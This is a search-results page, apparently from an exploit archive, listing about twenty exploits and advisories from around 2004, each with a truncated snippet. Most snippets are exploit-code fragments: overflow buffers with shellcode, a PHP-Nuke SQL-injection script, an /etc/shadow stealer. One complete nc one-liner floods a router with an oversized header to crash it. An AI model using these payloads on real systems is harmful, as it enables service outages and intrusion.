1697 matches found
GNU Sharutils 4.2.1 - Local Format String
GNU Sharutils 4.2.1 - Local Format String / GNU sharutils include include include include include include include include include define GNUSOURCE define DEFAULTDTORS...
PopMessenger 1.60 - Remote Denial of Service
PopMessenger 1.60 - Remote Denial of Service ///////////////////////// popmsgboom.c / by Luigi Auriemma / include include include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include include endif define VER "0.1" define PORT 8473...
Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service
Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service source: https://www.securityfocus.com/bid/11232/info The Pinnacle Systems ShowCenter web-based interface is reported prone to a remote denial of service vulnerability. The issue exists due to a lack of sanity checks performed on the...
PHP-Nuke - SQL Injection EditSave Messages
PHP-Nuke - SQL Injection EditSave Messages !/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy = "http://172.9.1.11:80/"; proxy:port ... $browser = LWP::UserAgent-new; $browser - agent$Agent; $url = 'http://www.sitewithphpnuke.com/admin.php';...
Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String
Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String / courier-imap = 3.0.2-r1 Remote Format String Vulnerability exploit Author: ktha at hush dot com Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2 Special thanks goes to andrewg for providing the FreeBSD box. Greetings: all the guys fro...
CVE-2002-1119
os._execvpe from os.py in Python 2.2.1 and earlier creates temporary files with predictable names, which could allow local users to execute arbitrary code via a symlink attack...
CesarFTP Server - Long Command Denial of Service
/ ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date : 2004-08-30...
MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit
Discovered and Exploit Coded by: Tal0n [email protected] URL: http://musicdaemon.sourceforge.net Note: This was 0day for several months.. I decided to turn it in because there may be 10 whole boxes in the world running this.. and it's not very handy sitting around on my box =p. / MusicDaemon ...
PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass
milw0rm.com 2004-08-08...
PHP 4.3.7 - php-exec-dir Patch Command Access Restriction Bypass
PHP 4.3.7 - php-exec-dir Patch Command Access Restriction Bypass milw0rm.com 2004-08-08...
Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash
Right Click On Me And Click "Save Target As" // milw0rm.com 2004-08-04...
Conceptronic CADSLR1 Router Denial of Service Vulnerability
No description provided by source. $ $victima="ip.victim" $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization: Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80 milw0rm.com 2004-07-22...
Apache - Arbitrary Long HTTP Headers (Denial of Service)
/usr/bin/perl exploit for apache apgetmimeheaderscore vuln adv is here: http://www.guninski.com/httpd1.html version: apache 2 newPeerAddr = $host,PeerPort = $port, Proto = 'tcp' || die "new error$@\n"; binmode$sock; $hostname="Host: $host"; $buf2='A'x50; $buf4='A'x8183; $len=length$buf2; $buf="GE...
Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
// source: https://www.securityfocus.com/bid/10710/info The Microsoft POSIX subsystem implementation is prone to a local buffer overflow vulnerability. A local attacker may exploit this vulnerability in order to run code with elevated privileges, fully compromising the vulnerable computer. /...
MySQL Authentication Bypass
NGSSoftware Insight Security Research Advisory Name: MySQL Authentication Bypass / Buffer Overflow Systems Affected: MySQL 4.1 prior to 4.1.3, and MySQL 5.0. Severity: High Vendor URL: http://www.mysql.com Author: Chris Anley [email protected] Date of Advisory: 1st July 2004 Whitepaper We hav...
phpMyAdmin 2.5.7 - Remote code Injection
phpMyAdmin 2.5.7 - Remote code Injection / phpmy-explt.c written by Nasir Simbolon eagle kecapi com Jakarta, Indonesia June, 10 2004 A phpMyAdmin-2.5.7 exploit program. This is a kind of mysql server wrapper acts like a proxy except that it will send a fake table name, when client query "SHOW...
Fusionphp Fusion News 3.6.1 - Cross-Site Scripting
source: https://www.securityfocus.com/bid/10203/info An attacker may be capable of executing arbitrary script code in a browser of a target user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also...
cobain-monit.pl
!/usr/bin/perl cobain-monit.pl monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos and debug print "connecting to server...\n"; $socket = IO::Socket::INET -...
Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service
source: https://www.securityfocus.com/bid/10067/info It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present itself when the 'SetSitesFile' is called in combination with setting t...
Roger Wilco Server 1.4.1 - UDP Datagram Handling Denial of Service
source: https://www.securityfocus.com/bid/10022/info Roger Wilco Server has been reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a flaw when handling malicious UDP payloads that are destined for the vulnerable server. A remote attacker may exploit...